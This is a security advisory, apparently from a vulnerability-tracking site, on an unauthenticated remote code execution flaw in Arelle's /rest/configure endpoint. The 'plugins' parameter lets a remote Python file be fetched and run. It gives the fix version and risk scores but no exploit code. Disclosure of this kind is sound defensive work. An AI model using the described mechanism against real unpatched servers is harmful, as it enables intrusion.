Primary

Context

Arelle Unauthenticated Remote Code Execution Vulnerability in REST Configure Endpoint

Vulnerability

A remote code execution vulnerability has been identified in Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and forwards it to the plugin manager without any authentication or authorization. This vulnerability allows attackers to provide a URL pointing to a malicious Python file via the plugins parameter. Consequently, the Arelle web server downloads and executes the attacker-controlled code within the Arelle process, using its privileges.

Impact

Exploitation of this vulnerability allows for unauthenticated remote code execution on the server where Arelle is running.

Remediation

Users can upgrade to Arelle version 2.39.10 or later to address this vulnerability.

Added: May 4, 2026, 6:19 PM

Updated: May 4, 2026, 6:19 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

6.6

remediation

0.0

relevance

7.5

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

7.5

exploitability

6.6

remediation

0.0

relevance

7.5

threat

0.0

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Arelle Unauthenticated Remote Code Execution Vulnerability in REST Configure Endpoint

Vulnerability

Impact

Remediation

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating